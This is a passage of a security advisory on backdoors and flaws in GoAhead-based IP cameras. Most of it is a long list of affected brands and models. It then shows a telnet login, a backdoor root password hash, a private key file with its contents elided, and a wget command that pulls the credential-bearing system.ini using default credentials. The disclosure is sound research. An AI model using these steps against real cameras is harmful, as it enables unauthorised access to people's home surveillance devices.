F2-611B\r\nEasyN F3\r\nEasyN F3-166\r\nEasyN F3-176M\r\nEasyN F3-M166\r\nEasyN F3-SERIES\r\nEasyN F3-Series\r\nEasyN F3-m187\r\nEasyN F3M187\r\nEasyN FS-613A-M136\r\nEasyN FS-613B\r\nEasyN FS-613B-M166\r\nEasyN FS-613B-MJPEG\r\nEasyN FS613\r\nEasyN F_M10R\r\nEasyN H3-V10R\r\nEasyN H6-M137h\r\nEasyN M091\r\nEasyN Other\r\nEasyN est-007660-611b\r\nEasyN est-007660333\r\nEasyN f\r\nEasyN f-Series\r\nEasyN f138\r\nEasyN f_series\r\nEasyN fseries\r\nEasyN kitch\r\nEasyN s\r\nEasySE F/B/N/I\r\nEasySE H3\r\nEasySE H3e\r\nEasySE Other\r\nEbode IPV38W\r\nEbode IPV58\r\nEbode Other\r\nEgo Other\r\nElro 901\r\nElro 903\r\nElro 903IP\r\nElro C7031P\r\nElro C703IP2\r\nElro C704-IP\r\nElro C704IP\r\nElro C704IP.2\r\nElro C704ip\r\nElro C803IP\r\nElro C903IP\r\nElro C903IP.2\r\nElro C904IP\r\nElro C904IP.2\r\nElro IP901\r\nElro Other\r\nEminent 6564\r\nEminent EM6220\r\nEminent EM6564\r\nEminent em6220\r\nEsky C5900\r\nEsky 
L\r\nEsky Live\r\nEsky c5900\r\nEura-Tech IC-03C3\r\nEyeCam ICAM-608\r\nEyeCam IP65IW\r\nEyeCam Other\r\nEyeCam STORAGEOPTIONS\r\nEyeIPCam IP901W\r\nEyeSight ES-IP607W\r\nEyeSight ES-IP811W\r\nEyeSight ES-IP909IW\r\nEyeSight ES-IP935FW\r\nEyeSight ES-IP935IW\r\nEyeSight IP910IW\r\nEyeSight IP915IW\r\nEyeSight Other\r\nEyeSight ip609IW\r\nEyeSight ip909iw\r\nEyeSight ip915iw\r\nEyeSight mjpeg\r\nEyeSpy247 Other\r\nF-Series FSERIES\r\nF-Series Ip\r\nF-Series Other\r\nF-Series ip\r\nFirst+Concept Other\r\nFocuscam F19821W\r\nFoscam FI18904w\r\nFoscam FI18905E\r\nFoscam FI18905W\r\nFoscam FI18906w\r\nFoscam FI1890W\r\nFoscam FI18910E\r\nFoscam FI18910W\r\nFoscam FI18910w\r\nFoscam FI18916W\r\nFoscam FI18918W\r\nFoscam FI18919W\r\nFoscam FI19810W\r\nFoscam FI8094W\r\nFoscam FI81904W\r\nFoscam FI8601W\r\nFoscam FI8602W\r\nFoscam FI8606W\r\nFoscam FI8610w\r\nFoscam FI8903W\r\nFoscam FI8903W_Elita\r\nFoscam FI8904\r\nFoscam FI8904W\r\nFoscam FI8905E\r\nFoscam FI8905W\r\nFoscam FI8905w\r\nFoscam FI8906w\r\nFoscam FI8907W\r\nFoscam FI8908W\r\nFoscam FI8909W\r\nFoscam FI890W\r\nFoscam FI8910\r\nFoscam FI8910E\r\nFoscam FI8910W\r\nFoscam FI8910W_DW\r\nFoscam FI8910w\r\nFoscam FI8916W\r\nFoscam FI8918\r\nFoscam FI89180w\r\nFoscam FI8918E\r\nFoscam FI8918W\r\nFoscam FI8918w\r\nFoscam FI8919W\r\nFoscam FI9804W\r\nFoscam FI9805E\r\nFoscam FI9810\r\nFoscam FI9810W\r\nFoscam FI9818\r\nFoscam FI9820w\r\nFoscam FI9821W\r\nFoscam FI9821w\r\nFoscam FL8910\r\nFoscam FS18908W\r\nFoscam FS8910\r\nFoscam Fi8910\r\nFoscam Other\r\nFoscam fI8989w\r\nFoscam fi1890w\r\nFoscam fl8910w\r\nFoxCam PTZ2084-L\r\nGIGA gb\r\nGT+ROAD HS-006344-SPSLM\r\nGeneral Other\r\nGeneric All-in-one\r\nGeneric Billy\r\nGeneric DomeA-Outdoor\r\nGeneric IP\r\nGeneric Other\r\nGi-star+srl IP6031W\r\nGigaeye GB\r\nGoAhead EC-101SD\r\nGoAhead GoAheadWebs\r\nGoAhead IPCAM1\r\nGoAhead IPCAM2\r\nGoAhead Other\r\nGoAhead thedon\r\nGoCam Other\r\nGoclever EYE\r\nGoclever EYE2\r\nGotake GTK-TH01B\r\nH+264+network+DVR 
720p\r\nH+264+network+DVR Other\r\nH.264 Other\r\nH6837WI Other\r\nHD+IPC Other\r\nHD+IPC SV3C\r\nHDIPCAM Other\r\nHeden CAMH04IPWE\r\nHeden CAMHED02IPW\r\nHeden CAMHED04IP\r\nHeden CAMHED04IPWN\r\nHeden CAMHEDIPWP\r\nHeden Other\r\nHeden VisionCam\r\nHeden visionCam\r\nHiSilicon Other\r\nHikvision DS-2CD2132\r\nHistream RTSP\r\nHooToo F-SERIES\r\nHooToo HOOTOO\r\nHooToo HT-IP006\r\nHooToo HT-IP006N\r\nHooToo HT-IP009HDP\r\nHooToo HT-IP206\r\nHooToo HT-IP207F\r\nHooToo HT-IP210HDP\r\nHooToo HT-IP210P\r\nHooToo HT-IP212\r\nHooToo IP009HDP\r\nHooToo Other\r\nHooToo apm-h803-mpc\r\nHsmartlink Other\r\nHungtek WIFI\r\nICAMView Other\r\nICam I908W\r\nICam IP-1\r\nICam Other\r\nICam Other2\r\nICam dome\r\nINISOFT-CAM Stan\r\nINSTAR 4010\r\nINVID Other\r\nIO+Data Other\r\nIP66 Other\r\nIPC IPC02\r\nIPC Other\r\nIPC S5030-TF\r\nIPC S5030-m\r\nIPC SRICAM\r\nIPCC 3XPTZ\r\nIPCC 7210W\r\nIPCC IPCC-7210W\r\nIPCC x01\r\nIPTeles Other\r\nIPUX ip-100\r\nISIT Other\r\nIZOtech Other\r\nIZTOUCH 0009\r\nIZTOUCH A001\r\nIZTOUCH IZ-009\r\nIZTOUCH LTH-A8645-c15\r\nIZTOUCH Other\r\nIZTOUCH Other1\r\nIZTOUCH ap001\r\nIeGeek Other\r\nIeGeek ukn\r\nInkovideo V-104\r\nIprobot3 Other\r\nJRECam JM3866W\r\nJWcam JWEV\r\nJWcam Other\r\nJaycar 3834\r\nJaycar 720P\r\nJaycar Other\r\nJaycar QC-3831\r\nJaycar QC-3832\r\nJaycar QC-3834\r\nJaycar QC-3836\r\nJaycar QC-3839\r\nJaytech IP6021W\r\nJhempCAM Back\r\nJhempCAM Other\r\nKaiKong 1601\r\nKaiKong 1602w\r\nKaiKong Other\r\nKaiKong SIP\r\nKaiKong SIP1602\r\nKaiKong SIP1602W\r\nKaiKong sip\r\nKaiKong sip1602w\r\nKenton gjc02\r\nKinson C720PWIP\r\nKlok Other\r\nKnewmart KW01B\r\nKnewmart KW02B\r\nKogan KAIPC01BLKA\r\nKogan KAIPCO1BLKA\r\nKogan Other\r\nKogan encoder\r\nKogan kaipc01blkb\r\nKompernass IUK\r\nKoolertron Other\r\nKoolertron PnP\r\nKoolertron SP-SHEX21-SL\r\nLC+security Other\r\nLW lw-h264tf\r\nLYD H1385H\r\nLager Other\r\nLeadtek C351\r\nLevelOne 1010/2010\r\nLibor Other\r\nLifeTech MyLifeTech\r\nLifeTech Other\r\nLifeTech dd\r\nLilly 
Other\r\nLinq Other\r\nLloyds 1107\r\nLoftek CXS\r\nLoftek Nexus\r\nLoftek Other\r\nLoftek SPECTOR\r\nLoftek Sendinel\r\nLoftek Sentinel\r\nLogiLink WC0030A\r\nLogiLink wc0044\r\nLogitech C920\r\nMCL 610\r\nMJPEG Other\r\nMaginon 100\r\nMaginon 10AC\r\nMaginon 20C\r\nMaginon IP-20c\r\nMaginon IPC\r\nMaginon IPC-1\r\nMaginon IPC-10\r\nMaginon IPC-100\r\nMaginon IPC-100AC\r\nMaginon IPC-10AC\r\nMaginon IPC-2\r\nMaginon IPC-20\r\nMaginon IPC20C\r\nMaginon IPC_1A\r\nMaginon Other\r\nMaginon SUPRA\r\nMaginon Supra\r\nMaginon ipc\r\nMaginon ipc-1a\r\nMaginon ipc100a\r\nMaginon ipx\r\nMaginon w2\r\nMarmitek GM-8126\r\nMaygion IP\r\nMaygion OTHER2\r\nMaygion Other\r\nMaygion V3\r\nMaygion black\r\nMediatech mt4050\r\nMedisana SmartBabyMonitor\r\nMerlin IP\r\nMerlin Other\r\nMerlin vstc\r\nMessoa Other\r\nMingyoushi S6203Y-WR\r\nMomentum 2002\r\nMomentum MO-CAM\r\nNEXCOM S-CAM\r\nNIP NIP-004500-KMTLU\r\nNIP NIP-075007-UPHTF\r\nNIP NIP-11BGPW\r\nNIP NIP-14\r\nNTSE Other\r\nNeewer Other\r\nNeewer V-100\r\nNeo+CoolCam NIP\r\nNeo+CoolCam NIP-02(OAM)\r\nNeo+CoolCam NIP-06\r\nNeo+CoolCam NIP-066777-BWESL\r\nNeo+CoolCam NIP-102428-DFBEF\r\nNeo+CoolCam NIP-H20(OZX)\r\nNeo+CoolCam OBJ-007260-LYLDU\r\nNeo+CoolCam Other\r\nNeo+CoolCam neo\r\nNeo+CoolCam nip-11\r\nNeo+CoolCam nip-20\r\nNess Other\r\nNetView Other\r\nNetcam Dual-HD\r\nNetcam HSL-232245-CWXES\r\nNetcam OUVIS\r\nNetcam Other\r\nNetware Other\r\nNexxt+Solution Xpy\r\nNixzen Other\r\nNorthQ NQ-9006\r\nOffice+One CM-I11123BK\r\nOffice+One IP-900\r\nOffice+One IP-99\r\nOffice+One Other\r\nOffice+One SC-10IP\r\nOffice+One ip-900\r\nOffice+One ip900\r\nOpexia OPCS\r\nOptica+Video FI-8903W\r\nOptica+Video FI-8918W\r\nOptica+Video Other\r\nOtto 4eye\r\nOvermax CamSpot\r\nOvermax Camspot\r\nOwlCam CP-6M201W\r\nP2p wificam\r\nPCS Other\r\nPanasonic BL-C131A\r\nPeopleFu IPC-674\r\nPeopleFu IPCAM1\r\nPeopleFu IPCAM2\r\nPeopleFu IPCAM3\r\nPeopleFu IPCAM5\r\nPixpo 1Z074A2A0301627785\r\nPixpo PIX006428BFYZY\r\nPixpo 
PIX009491MLJYM\r\nPixpo PIX009495HURFE\r\nPixpo PIX010584DFACE\r\nPlaisio IP\r\nPlanex Other\r\nPlanex PLANEX\r\nPolariod P351S\r\nPolaroid IP-100\r\nPolaroid IP-101W\r\nPolaroid IP-200B\r\nPolaroid IP-201B\r\nPolaroid IP-350\r\nPolaroid IP-351S\r\nPolaroid IP-360S\r\nPolaroid IP-810W\r\nPolaroid IP-810WZ\r\nPolaroid Other\r\nPolaroid POLIP101W\r\nPolaroid POLIP201B\r\nPolaroid POLIP201W\r\nPolaroid POLIP351S\r\nPolaroid POLIP35i5\r\nPowerLead Caue\r\nPowerLead PC012\r\nProveCam IP2521\r\nProvision 717\r\nProvision F-717\r\nProvision F-737\r\nProvision PT-737\r\nProvision WP-711\r\nProvision WP-717P\r\nPyle HD\r\nPyle HD22\r\nPyle HD46\r\nPyle Mine\r\nPyle PIPCAM15\r\nPyle Pipcam12\r\nPyle cam5\r\nPyle pipcam25\r\nPyle pipcam5\r\nQ-nest QN-100S\r\nQ-nest qn-100s\r\nQueback 720p\r\nROCAM NC-400\r\nROCAM NC-500\r\nROCAM NC300\r\nROCAM NC300-1\r\nROHS IP\r\nROHS none\r\nRTX 06R\r\nRTX DVS\r\nRTX IP-06R\r\nRTX IP-26H\r\nRTX Other\r\nRollei safetycam-10hd\r\nSES Other\r\nSKJM Other\r\nSST SST-CNS-BUI18\r\nSVB+International SIP-018262-RYERR\r\nSafeHome 278042\r\nSafeHome 616-W\r\nSafeHome IP601W-hd\r\nSafeHome Other\r\nSafeHome VGA\r\nSafeHome iprobot\r\nSamsung Other\r\nSantec-Video Other\r\nSarotech IPCAM-1000\r\nSarotech ip300\r\nScricam 004\r\nScricam 192.168.1.7\r\nScricam AP-004\r\nScricam AP-009\r\nScricam AP0006\r\nScricam AP006\r\nSecam+CCTV IPCAM\r\nSecam+CCTV Other\r\nSeculink 10709\r\nSeculink Other\r\nSecur+Eye xxc5330\r\nSeisa JK-H616WS\r\nSenao PTZ-01H\r\nSequrecam Other\r\nSequrecam PNP-125\r\nSercomm Other\r\nShenwhen+Neo+Electronic+Co NC-541\r\nShenwhen+Neo+Electronic+Co Other\r\nShenwhen+Neo+Electronic+Co X-5000B\r\nShenzhen 720P\r\nShixin+China IP-129HW\r\nSiepem IPC\r\nSiepem S5001Y-BW\r\nSiepem S6203y\r\nSiepem S6211Y-WR\r\nSimi+IP+Camera+Viewer Other\r\nSineoji Other\r\nSineoji PT-315V\r\nSineoji PT-3215P\r\nSineoji PT-325IP\r\nSinocam Other\r\nSky+Genious Genious\r\nSkytronic IP\r\nSkytronic IP99\r\nSkytronic Other\r\nSkytronic WiFi\r\nSkytronic 
dome\r\nSmartEye Other\r\nSmartWares C723IP\r\nSmartWares c724ip\r\nSmartWares c923ip\r\nSmartWares c924ip\r\nSolwise SEC-1002W-IR\r\nSpy+Cameras WF-100PCX\r\nSpy+Cameras WF-110V\r\nSricam 0001\r\nSricam 004\r\nSricam A0009\r\nSricam A001\r\nSricam AP-001\r\nSricam AP-003\r\nSricam AP-004\r\nSricam AP-005\r\nSricam AP-006\r\nSricam AP-009\r\nSricam AP-012\r\nSricam AP-CAM\r\nSricam AP0009\r\nSricam AP002\r\nSricam AP995\r\nSricam Cam1\r\nSricam Front\r\nSricam Home\r\nSricam Other\r\nSricam SP005\r\nSricam SP012\r\nSricam SP013\r\nSricam SP015\r\nSricam SRICAM\r\nSricam SRICAM1\r\nSricam aj-c2wa-c118\r\nSricam ap\r\nSricam ap006\r\nSricam ap1\r\nSricam h.264\r\nSricam sp013\r\nSricctv A-0006\r\nSricctv A-009\r\nSricctv AJ-006\r\nSricctv AP-0001\r\nSricctv AP-0005\r\nSricctv AP-0009\r\nSricctv AP-001\r\nSricctv AP-002\r\nSricctv AP-003\r\nSricctv AP-004\r\nSricctv AP-004AF\r\nSricctv AP-005\r\nSricctv AP-006\r\nSricctv AP-007\r\nSricctv AP-008\r\nSricctv AP-009\r\nSricctv AP-011\r\nSricctv AP-014\r\nSricctv H-264\r\nSricctv Other\r\nSricctv P2P-BLACK\r\nSricctv P2P-Black\r\nSricctv SP-007\r\nSricctv SR-001\r\nSricctv SR-004\r\nStar+Vedia 6836\r\nStar+Vedia 7837-WIP\r\nStar+Vedia C-7835WIP\r\nStar+Vedia Other\r\nStar+Vedia T-6836WTP\r\nStar+Vedia T-7833WIP\r\nStar+Vedia T-7837WIP\r\nStar+Vedia T-7838WIP\r\nStarCam C33-X4\r\nStarCam EY4\r\nStarCam F6836W\r\nStarCam Other\r\nStarCam c7837wip\r\nStipelectronics Other\r\nStorage+Options HOMEGUARD\r\nStorage+Options Other\r\nStorage+Options SON-IPC1\r\nSumpple 610\r\nSumpple 610S\r\nSumpple 631\r\nSumpple 960P\r\nSumpple S601\r\nSumpple S610\r\nSumpple S631\r\nSumpple S651\r\nSumpple qd300\r\nSumpple s631\r\nSunVision+US Other\r\nSunbio Other\r\nSuneyes Other\r\nSuneyes SP-T01EWP\r\nSuneyes SP-T01WP\r\nSuneyes SP-TM01EWP\r\nSuneyes SP-TM01WP\r\nSuneyes SP-tm05wp\r\nSunluxy H-264\r\nSunluxy HZCam\r\nSunluxy Other\r\nSunluxy PTZ\r\nSunluxy SL-701\r\nSupra+Space IPC\r\nSupra+Space IPC-1\r\nSupra+Space 
IPC-100AC\r\nSupra+Space IPC-10AC\r\nSupra+Space Other11\r\nSupra+Space ipc-20c\r\nSure-Eye Other\r\nSurecom LN-400\r\nSwann 005FTCD\r\nSwann 440\r\nSwann 440-IPC\r\nSwann ADS-440\r\nSwann ADS-440-PTZ\r\nSwann ADS-CAMAX1\r\nSwann Other\r\nSwann SWADS-440-IPC\r\nSwann SWADS-440IPC-AU\r\nSygonix 43176A\r\nSygonix 43558A\r\nSzneo CAM0X\r\nSzneo CoolCam\r\nSzneo NIP\r\nSzneo NIP-0\r\nSzneo NIP-02\r\nSzneo NIP-031\r\nSzneo NIP-031H\r\nSzneo NIP-06\r\nSzneo NIP-12\r\nSzneo NIP-2\r\nSzneo NIP-20\r\nSzneo NIP-210485-ABABC\r\nSzneo NIP-26\r\nSzneo NIP-X\r\nSzneo NP-254095\r\nSzneo Other\r\nSzneo TFD\r\nTAS-Tech Other\r\nTechnaxx tx-23\r\nTechview GM8126\r\nTechview QC-3638\r\nTechview qc3839\r\nTemvis Other\r\nTenda C50S\r\nTenda c30\r\nTenda c5+\r\nTenvis 0012\r\nTenvis 3815\r\nTenvis 3815-W\r\nTenvis 3815W\r\nTenvis 3815W.\r\nTenvis 3815W2013\r\nTenvis IP-319W\r\nTenvis IP-319w\r\nTenvis IP-391W\r\nTenvis IP-391WHD\r\nTenvis IP-602W\r\nTenvis IP602W\r\nTenvis IPROBOT\r\nTenvis JP-3815W\r\nTenvis JPT-3814WP2P\r\nTenvis JPT-3815\r\nTenvis JPT-3815-P2P\r\nTenvis JPT-3815W\r\nTenvis JPT-3815W+\r\nTenvis JPT-3815WP2P\r\nTenvis JPT-3815w\r\nTenvis JPT-3818\r\nTenvis MINI-319W\r\nTenvis Mini-319\r\nTenvis Other\r\nTenvis PT-7131W\r\nTenvis TH-661\r\nTenvis TR-3818\r\nTenvis TR-3828\r\nTenvis TR3815W\r\nTenvis TZ100\r\nTenvis TZ100/IPROBOT3\r\nTenvus JPG3815W\r\nThreeboy IP-660\r\nTopcam SL-30IPC01Z\r\nTopcam SL-720IPC02Z\r\nTopcam SL-910IW30\r\nTopica+CCTV Other\r\nTrivision NC-335PW-HD-10\r\nTrust NW-7500\r\nTurbo+X Endurance\r\nTurbo+X IIPC-20\r\nUokoo 720P\r\nVCatch Other\r\nVCatch VC-MIC720HK\r\nValtronics IP\r\nValtronics Other\r\nVandesc IP900\r\nVantech Other\r\nVantech PTZ\r\nVideosec+Security IPC-103\r\nVideosec+Security IPP-105\r\nVimicro Other\r\nVitek+CCTV Other\r\nVstarcam 7823\r\nVstarcam C-7824WIP\r\nVstarcam C-7833WIP-X4\r\nVstarcam C-7833wip\r\nVstarcam C-7837WIP\r\nVstarcam C-7838WIP\r\nVstarcam C50S\r\nVstarcam C7816W\r\nVstarcam C7824WIP\r\nVstarcam 
C782WIP\r\nVstarcam C7842WIP\r\nVstarcam C93\r\nVstarcam C=7824WIP\r\nVstarcam Cam360\r\nVstarcam F-6836W\r\nVstarcam H-6837WI\r\nVstarcam H-6837WIP\r\nVstarcam H-6850\r\nVstarcam H-6850WIP\r\nVstarcam H-6850wip\r\nVstarcam ICAM-608\r\nVstarcam Other\r\nVstarcam T-6835WIP\r\nVstarcam T-6836WTP\r\nVstarcam T-6892wp\r\nVstarcam T-7815WIP\r\nVstarcam T-7833WIP\r\nVstarcam T-7833wip\r\nVstarcam T-7837WIP\r\nVstarcam T-7838WIP\r\nVstarcam T-7892WIP\r\nVstarcam T6836WTP\r\nVstarcam T7837WIP\r\nVstarcam c7815wip\r\nVstarcam c7833wip\r\nVstarcam c7850wip\r\nWanscam 00D6FB01980F\r\nWanscam 106B\r\nWanscam 118\r\nWanscam 541-W\r\nWanscam 543-W\r\nWanscam 790\r\nWanscam AJ-C0WA-198\r\nWanscam AJ-C0WA-B106\r\nWanscam AJ-C0WA-B116\r\nWanscam AJ-C0WA-B168\r\nWanscam AJ-C0WA-B1D8\r\nWanscam AJ-C0WA-C0D8\r\nWanscam AJ-C0WA-C116\r\nWanscam AJ-C0WA-C126\r\nWanscam AJ-C2WA-B118\r\nWanscam AJ-C2WA-C116\r\nWanscam AJ-C2WA-C118\r\nWanscam AJ-C2WA-C198\r\nWanscam AJ-COWA-B1D8\r\nWanscam AJ-COWA-C116\r\nWanscam AJ-COWA-C126\r\nWanscam AJ-COWA-C128\r\nWanscam AW00004J\r\nWanscam B1D8-1\r\nWanscam C-118\r\nWanscam C-126\r\nWanscam Colour\r\nWanscam FI-18904w\r\nWanscam FR-4020A2\r\nWanscam FR4020A2\r\nWanscam HD-100W\r\nWanscam HW-0021\r\nWanscam HW-0022\r\nWanscam HW-0022HD\r\nWanscam HW-0023\r\nWanscam HW-0024\r\nWanscam HW-0025\r\nWanscam HW-0026\r\nWanscam HW-0028\r\nWanscam HW-0033\r\nWanscam HW-0036\r\nWanscam HW-0038\r\nWanscam HW-0039\r\nWanscam HW-22\r\nWanscam HW0030\r\nWanscam IP\r\nWanscam JW-0001\r\nWanscam JW-0003\r\nWanscam JW-0004\r\nWanscam JW-0004m\r\nWanscam JW-0005\r\nWanscam JW-0006\r\nWanscam JW-0008\r\nWanscam JW-0009\r\nWanscam JW-0010\r\nWanscam JW-0011\r\nWanscam JW-0011l\r\nWanscam JW-0012\r\nWanscam JW-0018\r\nWanscam JW-004\r\nWanscam JW-009\r\nWanscam JW-CD\r\nWanscam JW000008\r\nWanscam JW0009\r\nWanscam JW001\r\nWanscam JW0012\r\nWanscam JW008\r\nWanscam JWEV\r\nWanscam JWEV-011777-NSRVV\r\nWanscam JWEV-011921-RXSXT\r\nWanscam JWEV-360171-BBEAC\r\nWanscam 
JWEV-380096-CECDB\r\nWanscam JWEV-PEPLOW\r\nWanscam NBC-543W\r\nWanscam NC-530\r\nWanscam NC-541\r\nWanscam NC-541/W\r\nWanscam NC-541W\r\nWanscam NC-541w\r\nWanscam NC-543W\r\nWanscam NCB-534W\r\nWanscam NCB-540W\r\nWanscam NCB-541W\r\nWanscam NCB-541WB\r\nWanscam NCB-543W\r\nWanscam NCBL-618W\r\nWanscam NCH-532MW\r\nWanscam NCL-610W\r\nWanscam NCL-612W\r\nWanscam NCL-616W\r\nWanscam NCL-S616W\r\nWanscam Other\r\nWanscam TG-002\r\nWanscam WJ-0004\r\nWanscam WX-617\r\nWanscam Works\r\nWanscam XHA-120903181\r\nWanscam XHA-4020a2\r\nWanscam __PTZ\r\nWanscam chiOthernese\r\nWanscam ip\r\nWanscam jw0005\r\nWanscam jw0010\r\nWansview 541\r\nWansview 625W\r\nWansview MCM-627\r\nWansview N540w\r\nWansview NCB-534W\r\nWansview NCB-541W\r\nWansview NCB-541w\r\nWansview NCB-543W\r\nWansview NCB541W\r\nWansview NCB545W\r\nWansview NCL-610W\r\nWansview NCL610D04\r\nWansview NCL614W\r\nWansview Other\r\nWansview dcs543w\r\nWansview nc543w\r\nWardmay+CCTV WDM-6702AL\r\nWatch+bot+Camera resup\r\nWebcamXP Other\r\nWinBook Other\r\nWinBook T-6835\r\nWinBook T-6835WIP\r\nWinBook T-7838\r\nWinic NVT-530004\r\nWise+Group Other\r\nX-Price Other\r\nX10 39A\r\nX10 AIRSIGHT\r\nX10 AirSight\r\nX10 Airsight\r\nX10 Jake\r\nX10 Other\r\nX10 XC-38A\r\nX10 XX-36A\r\nX10 XX-39A\r\nX10 XX-56A\r\nX10 XX-59A\r\nX10 XX-60\r\nX10 XX-69A\r\nX10 XX41Ahome\r\nXVision Other\r\nXXCamera 53100\r\nXXCamera 5330-E\r\nXXCamera Other\r\nXXCamera XXC-000723-NJFJD\r\nXXCamera XXC-092411-DCAFC\r\nXXCamera XXC-50100-H\r\nXXCamera XXC-50100-T\r\nXXCamera XXC-5030-E\r\nXXCamera XXC-53100-T\r\nXXCamera XXC52130\r\nXin+Ling Other\r\nYawcam Other\r\nZilink Other\r\nZmodo CMI-11123BK\r\nZmodo IP-900\r\nZmodo Other\r\nZodiac+Security 909\r\nZodiac+Security Other\r\nZoneway NC638MW-P\r\nZyXEL Other\r\nalexim Other\r\nalexim cam22822\r\nalias Other\r\nall+in+one+ Other\r\nall+in+one+ b1\r\nall-in-one Other\r\nallecto DVC-150IP\r\napc Other\r\nasw-006 Other\r\nboh l\r\nbravo Other\r\nbush+plus BU-300WF\r\nccam p2p\r\nchina 
8904W\r\nchina HDIPCAM\r\nchina IPCAM\r\nchina Other\r\nchina PTZCAM\r\nchina np-02\r\nciana+exports antani\r\ncina Other\r\ncoolead L\r\ncoolead L610WS\r\ndax Other\r\ndenver IPC-320\r\ndenver IPO-320\r\ne-landing 720p\r\neScam QF100\r\nebw Other\r\nepexis PIPCAMHD82\r\nepexis pipcam5\r\nesecure nvp\r\ngeeya C602\r\ngeeya P2P\r\ngeeya c801\r\nhdcam Other\r\nhomeguard 720P\r\nhomeguard Other\r\nhomeguard Wireless\r\nhomeguard wifi\r\niView ID002A\r\niView Other\r\ninsteon 75790\r\ninsteon 75790wh\r\ninsteon High\r\ninsteon Other\r\ninsteon Wireless\r\niuk 5A1\r\nivision hdwificam\r\niwitness bullet\r\njwt Other\r\njyacam JYA8010\r\nkadymay KDM-6800\r\nkadymay KDM6702\r\nkadymay KMD-6800\r\nkadymay Other\r\nkang+xun xxc5030-t\r\nkines Other\r\nkiocong 1601\r\nkiocong 1602\r\nkiocong 1609\r\nkiocong Other\r\nkodak 201pl\r\nkoicong 1601\r\nl+series CAM0758\r\nl+series CAM0760\r\nl+series Other\r\nl+series V100\r\nlogan n8504hh\r\nmeyetech 095475-caeca\r\nmeyetech 188091-EFBAE\r\nmeyetech Other\r\nmeyetech WirelessCam\r\nmicasaverde VistaCamSD\r\npipcam HD17\r\npni 941w\r\npni IP451W\r\npni IP541W\r\npni IP941W\r\npni IP951W\r\npni Other\r\npnp IP\r\npnp Other\r\nsemac Other\r\nskylink WC-300PS\r\nstorex D-10H\r\n\r\n```\r\n\r\n[Shodan lists 185 000 vulnerable cameras](https://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f0171e9517f40e41).\r\n\r\n<a id=\"backdoor-account\"></a>\r\n\r\n## Details - Backdoor account\r\n\r\nBy default, telnetd is running on the camera.\r\n\r\n```\r\nuser@kali$ telnet 192.168.1.107\r\nTrying 192.168.1.107...\r\nConnected to 192.168.1.107.\r\nEscape character is '^]'.\r\n\r\napk-link login: admin\r\nPassword:\r\n\r\ntelnet> q\r\nConnection closed.\r\nuser@kali$\r\n\r\n```\r\n\r\nOne backdoor account exists in the camera:\r\n\r\n```\r\nroot:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh\r\n\r\n```\r\n\r\n\r\n\r\n## Details - RSA key and certificates\r\n\r\nThe `/system/www/pem/ck.pem` contains an Apple certificate with a private 
RSA key:\r\n\r\n```\r\n/ # cat /system/www/pem/ck.pem \r\nBag Attributes\r\n friendlyName: Apple Production IOS Push Services: com.app.camera\r\n localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \r\nsubject=/UID=com.app.camera/CN=Apple Production IOS Push Services: com.app.camera/OU=SQ6NNPBE2K/C=US\r\nissuer=/C=US/O=Apple Inc./OU=Apple Worldwide Developer Relations/CN=Apple Worldwide Developer Relations Certification Authority\r\n-----BEGIN CERTIFICATE-----\r\n[...]\r\n-----END CERTIFICATE-----\r\nBag Attributes\r\n friendlyName: andrew\r\n localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \r\nKey Attributes: <No Attributes>\r\n-----BEGIN RSA PRIVATE KEY-----\r\n[...]\r\n-----END RSA PRIVATE KEY-----\r\n\r\n```\r\n\r\n<a id=\"pre-auth-info-leak-goahead\"></a>\r\n\r\n## Details - Pre-Auth Info Leak (credentials) within the GoAhead http server\r\n\r\nThe HTTP interface is provided by GoAhead. It allows 2 kinds of authentication:\r\n\r\n* htdigest authentication OR\r\n* authentication using credentials in URI (`?loginuse=LOGIN&?loginpas=PASS`).\r\n\r\nBy default, the web directory contains symbolic links to configuration files (`system.ini` and `system-b.ini` contain credentials):\r\n\r\n```\r\n/tmp/web # ls -la *ini\r\nlrwxrwxrwx 1 root 0 25 Oct 27 02:11 factory.ini -> /system/param/factory.ini\r\nlrwxrwxrwx 1 root 0 30 Oct 27 02:11 factoryparam.ini -> /system/param/factoryparam.ini\r\nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 network-b.ini -> /system/www/network.ini\r\nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 network.ini -> /system/www/network.ini\r\nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 system-b.ini -> /system/www/system.ini\r\nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 system.ini -> /system/www/system.ini\r\n/tmp/web #\r\n\r\n```\r\n\r\nWith valid credentials, an attacker can retrieve the configuration, as shown below:\r\n\r\n```\r\nuser@kali$ wget -qO- 'http://admin:admin@192.168.1.107/system.ini'|xxd\r\n\r\n[...]\r\n000001d0: ffff ffff 
ffff ffff ffff ffff ffff ffff ................\r\n000001e0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n000001f0: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n00000200: ffff ffff ffff ffff ffff ffff ffff ffff ................\r\n00000210: ffff ffff ffff ffff ffff ffff 7b6f 1158 ............{o.X\r\n00000220: 0000 0000 0100 0000 7469 6d65 2e6e 6973 ........time.nis\r\n00000230: 742e 676f 7600 0000 0000 0000 0000 0000 t.gov...........\r\n00000240: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000250: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000260: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000270: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000280: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000290: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n000002c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n[...]\r\n00000640: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000650: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000660: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000670: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000680: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000690: 6164 6d69 6e00 0000 0000 0000 0000 0000 